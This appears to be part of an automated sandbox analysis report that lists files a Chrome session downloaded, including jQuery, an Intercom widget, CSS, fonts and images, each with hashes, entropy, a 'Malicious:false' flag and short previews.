                                                                                                                                                                                                                        URL:https://widget.intercom.io/widget/nc7yq1pg
                                                                                                                                                                                                                        Preview:...........Y.s.8..+..&.........uK.....0{{Sz..V..-ye.i6...G.G.$.3.@k.z....xdZ.9....qW.DZ4X.x.?..*:uW....*.V..........".;9......$.XT*....(.F..qEe(. lO.&T..0..q..QJ.l..-.......lF..F............:;.)....^,.....:..Os.F..#...T...."q<JDD...n.....(.[...YD...I....tJN_...=....E.I...f...q......4tg....[.d..].e.g.......2..]W.f...+..(.D..QB...T.`o....O.k`#...h.7......LD.;2.Q..[yw.&.`..k..p%Us.-Q...d.3X...j.9/.).......e...=..).Be..5.e.Lp.f)..CDk.#.g....T..Z.T.+a...M....[{.L1..........Qi{u...H.P,..Z..W....*..*..MXH..2.n.X.k...BD[.....Hh.p....f.*....."..1..mG.8.kE..L*.)..]O..A...8\..s7.,.iWJ..M...s\.....^..$.....S....... ......H..n......H.....}G.[KP.*7G..(miU.l}.............Oy.|.Qa..V.K.f8T..d.?+.Zl..A....%%..8n=(H._Q.X.......|...Q.......zW..&. %..k..n.w^..zH.&.$..Zm...n.........&.....:.m..a....<..S]k..r%.o7...|...uvT..n...f..b.(F.L.q......&...C....GM!...h.Fv....Hg..B.....R..S..f.LIDe.]#5^.Lm.B&o."...y...3yJD".'...".......f.-e.9.jQ?$.SL._.)L
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):89501
                                                                                                                                                                                                                        Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):17842
                                                                                                                                                                                                                        Entropy (8bit):7.821645806304586
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:4B52ECDC33382C9DCA874F551990E704
                                                                                                                                                                                                                        SHA1:8F3BF8E41CD4CDDDB17836B261E73F827B84341B
                                                                                                                                                                                                                        SHA-256:CCE050CC3B150C0B370751021BB15018EE2B64AC369E230FE3B571A9B00D4342
                                                                                                                                                                                                                        SHA-512:AC3D3C82BAD9147AE5F083ED49C81A744F672DDFBB262135AA3F2C6601F8DFFEA11D8E323CEF025C36D76C6F2515AA6814B622CF504CA01D13346E9EA989048F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:RIFF.E..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.,...$.m.8..k.\.oDL.. ..TU....3'.{.g..6..2...6.DL`e..."&@..b.#&@......T.....'.....$......1.d...G........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........._...........................?...Z5[...B,.c...V-...m.0.../..?...............?.......?................_.....-...M.B.....=....C...[......w .X...ea.............VW.?b....[[.o^.Y.K...OD
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (399)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):400
                                                                                                                                                                                                                        Entropy (8bit):4.947090713216906
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:332D97B5E05AEBF6A8C4E95E3ADF8E6F
                                                                                                                                                                                                                        SHA1:5780B8630AF48C10688030F9BFA2D25F7AE299E3
                                                                                                                                                                                                                        SHA-256:EC7F959EC0EEF0D827C07B122E15128514AE300CF793B23DD0FC44517C77BF67
                                                                                                                                                                                                                        SHA-512:34FC0E75404157F4058E3C04269199799571F494992C358FFBA971E60E3C2FC355C4C27B5920D54022605DF938F19A889C573E79960D626A1D1D4D3BF4CCEDB7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://app.heptabase.com/assets/GuestPage-ec7f959e.css
                                                                                                                                                                                                                        Preview:._previewer_11nri_6 .ProseMirror-hepta-style{box-sizing:border-box;transform-origin:top left;--tw-scale-x: .7;--tw-scale-y: .7;transform:translate(var(--tw-translate-x),var(--tw-translate-y)) rotate(var(--tw-rotate)) skew(var(--tw-skew-x)) skewY(var(--tw-skew-y)) scaleX(var(--tw-scale-x)) scaleY(var(--tw-scale-y));overflow:auto;padding:1.25rem 1.75rem;width:142.8571428571%;height:142.8571428571%}.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):10796
                                                                                                                                                                                                                        Entropy (8bit):7.946024875001343
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:12BDACC832185D0367ECC23FD24C86CE
                                                                                                                                                                                                                        SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                                                                                                                                                                                        SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                                                                                                                                                                                        SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                                                                                                                                                                                                                        Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):28584
                                                                                                                                                                                                                        Entropy (8bit):7.992563951996154
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:17081510F3A6F2F619EC8C6F244523C7
                                                                                                                                                                                                                        SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                                                                                                                                                                                        SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                                                                                                                                                                                        SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://ms.naturdon.com/GDSherpa-regular.woff2
                                                                                                                                                                                                                        Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):7390
                                                                                                                                                                                                                        Entropy (8bit):4.02755241095864
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                                                                                                                                                                        SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                                                                                                                                                                        SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                                                                                                                                                                        SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://ms.naturdon.com/kllxu00N4Zd9GBpMkPRMJL6O3OU3at2FPw9cdgaD3BCq4jMfqcRJkHAx156168
                                                                                                                                                                                                                        Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):9648
                                                                                                                                                                                                                        Entropy (8bit):7.9099172475143416
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:4946EB373B18D178C93D473489673BB6
                                                                                                                                                                                                                        SHA1:16477ACB73B63CA251D37401249E7E4515FEBD24
                                                                                                                                                                                                                        SHA-256:666BC574C9F3FB28A8AC626FA8105C187C2A313736494A06BD5A937473673C92
                                                                                                                                                                                                                        SHA-512:F684B90B748DC8399F76C5D8F94AF6C4E6869143F18D19CE435B25EAA14E9647B120467BDD0795895676DC0CCCDEABF82BEB2F46CE2C5BF4C58ED9C134F30C48
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://ms.naturdon.com/qrmZhkmVs3lGM0Q2sgvoqCHgFfVy0uvbecffP7e0dWCi1FNiavl0Ms6yef238
                                                                                                                                                                                                                        Preview:RIFF.%..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH......0....n.mu..G..t042.....@...`[...%...6....9AD.'@.,f.B...+..+..+..W&.p.....h.......f.-...+.....m...n....E....O].+R.&Q..#.X.ip4..p......\O...\/....9.5.a..DfZ,K....8.....Z..2..z......t.......|.I.(..6E.D.}.C..OQD$S}iZ...[D.......q`(...@../.NQ......+"b%.X.D".G.*...0G...".2........x.O......7......E..&....e.F..4...K>.M..Pd.B...@'o./te..[.f....4[..a..x...9#.@$.=...t..=..t_.W....[..f.|fv...N...c6..k4}.9.7.....f.F3.4[...a...;.m.@N.n.0.....n.G[c.H.}..t.{..;....G...2.::..].0....
                                                                                                                                                                                                                        No static file info